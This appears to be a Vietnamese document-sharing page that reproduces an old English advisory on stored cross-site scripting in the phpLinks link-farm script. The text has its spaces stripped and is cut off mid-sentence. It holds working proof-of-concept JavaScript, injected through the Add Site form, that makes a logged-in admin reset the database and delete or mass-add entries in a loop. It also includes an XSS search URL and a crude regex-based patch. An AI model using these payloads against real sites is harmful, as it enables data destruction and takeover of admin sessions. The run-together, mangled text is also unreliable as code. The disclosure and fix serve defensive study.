Lỗi bảo mật với Multiple PHPLink

Tham khảo tài liệu lỗi bảo mật với multiple phplink, công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả
Nội dung trích xuất từ tài liệu:
Lỗi bảo mật với Multiple PHPLink.LỗibảomậtvớiMultiplePHPLink,chophéptruycậpvớiquyềnadmin:trangnàyđãđượcđọc lầnphplinkslàmộtfreesoftwaređượcdùngrấtphổbiếntronglinkfarmorsearchenginecólỗibảomậtchophépchènscriptsnguyhiểmvàoscriptsvàcóquyềngiốngnhưmộtadminsites!sauđâylàchitiếtnộidung:phpLinksisanopensourcefreePHPscript.phpLinksallowsyoutorunaverypowerfullinkfarmorsearchengine.phpLinkshasmultilevelsitecategorization,infinitethreadedsearchcapabilitiesandmore.phpLinksisverysimpletosetupThereliesafaultintheinclude/add.phpscriptthatallowsaremoteattackertoinjectcodeintothescriptandhaveitrunasanadmin.Thevulnerabilitycomesfromimproperinputvalidationandimpropersessionauthentication.BelowIssomeexamplecodethatIhavewritten.PutthisinoneofthefieldonAddSiteformlocatedathttp://blah/phplinks/index.php?show=add&PID=IfyouinjectthecodeintotheSiteTitleorSiteUrlfield,thecodewillberanassoonasaloggedinadministratorviewsit.Belowisthecodeforthecalledfiledeath.htmlvari=10;//ThisisthenumberoftheuserIDtostartdeletingvarBaseURL=http://victimsite/phplinks/;window.open(BaseURL+/admin/reset.php?reset_in=&reset_out=&search_terms=&referrers=&submit=);//thisresetsthedatabasefunctionWaste(){while(i){i++;window.open(BaseURL+admin/delete_site.php?dbtable=links&ID=+i+&sure=Yes);}}Asyoucansee,thatcode(whencalledbyaloggedinadminvalidatingsites)isrun,thedatabaseisinalotofcasesgoingtobeleftempty.Bytheway,thedbtable=linkscanbechangedtodbtable=tempinordertoaffectsitesnotyetapprovedetc.Ontheotherhandyoucanadduserstothedatabaseandmore.TakethefollowingcodeforexampleBelowisthecodeforthecalledfilelife.htmlvari=1;varBaseURL=http://victimsite/phplinks/;functionGluttony(){while(i){i++;window.open(BaseURL+/admin/add_site.php?SiteName=JeiAr0wnethTheee+ i+&SiteURL=http://www.b+i+j.orfd&Description=+i+3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t.+i+&UserName=12345+i+&Password=12345678&Hint=12345678910&add=+i+&sure=Yes);}}Onceagain,whenaloggedinadmingoestovalidatesites(unlesstheyhaveapopupkiller,JSdisabled,etc.)theyaregonnabeaddingMANYuserstothedatabasebeforetheyreallyrealizewhatshappening.Thisalsojoltstheserverquitabitbyhoggingupresources.Youcanbasicallychangealmostanythingthattheadmincanbyjustinjectingcode.Also,notethattheseproofofconceptscriptscouldbealteredtosupplylargenumbersofmalformedsitesubmissions,andinsteadmakeitsomethingworselikepopunderwindowsetc.ButIdonotfeelitwouldbeverygoodtoreleaseascriptlikethatpublicly:)AlsonotethatforwhateverreasonthemostupdatednortonAVdoesnotpickthisscriptupasawindowbomb.MaybeitscausemyJavaScriptissobastardizeditdoesntrecognizethecodeatall.hehehj/kIputtogetheraquickfix.Iamnophpguru,soifthereisabetterwaythenpleasecorrectme:)Intheincludes/add.phpfilefindthefollowing//Handleformsubmissionif(isset($submit_add)){Andrightbelowitpastethefollowingcode////////////////////////////////////////////////////////////////////////////PHPLinksCriticalXSSVulnerabilityFixByJeiArjeiar@kmfms.com////////////////////////////////////////////////////////////////////////////$ip=$REMOTE_ADDR;$info=$HTTP_USER_AGENT;if(ereg([!#$%&\*+\\.=?^_`{|}]$,$SiteName)){$err.=PleaseenterAvalidSiteName.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$SiteURL)){$err.=PleaseenterAvalidSiteURL.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$Description)){$err.=EnterAvalidDescription.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$Category)){$err.=EnterAvalidCategory.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$Country)){$err.=EnterAvalidCountry.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$UserName)){$err.=EnterAvalidUserName.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$PW)){$err.=PleaseenterAvalidPassword.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$PW2)){$err.=PleaseenterAvalidPassword.;}if(ereg([!#$%&\*+\\.=?^_`{|}]$,$Hint)){$err.=PleaseenterAvalidHint.;}if($err){echo$err;echoPossibleHackAttempt!!;echo$ip;echo$info;echoBack;exit;}/////////////////////////////////////////////////////////////////////////Thereisalsoamuchlessserious,butsimilarissuewiththesearchfeature.YoucanbasicallyexecutejustaboutanyJavaScriptorHTMLcodeandmaybemore?Hereisanexamplehttp://www.blah.org/index.php?term=0){Belowitplacethefollowing///////////////////////////////////////////////////////////////////////////PHPLinksXSSVulnerabilityFixByJeiArjeiar@kmfms.com012003///////////////////////////////////////////////////////////////////////////$ip=$REMOTE_ADDR;$info=$HTTP_USER_AGENT;if(ereg([!#$%&\*+\\.=?^_`{|}]$,$term)){$err.=PleaseenterAvalidSearchTerm.;}if($err){echo$err;echoPossibleHackAttempt!!;echo$ip;echo$info;echoBack;exit;}////////////////////////////////////////////////////////////////////////Onebadthingaboutthemostsearchedforkeywordsfeature,isthatanyonecanputtheirwebpage,name,orsomethingobsceneasasearchterm.Afterclickingsubmitxxxnumberoftimes,theynowh ...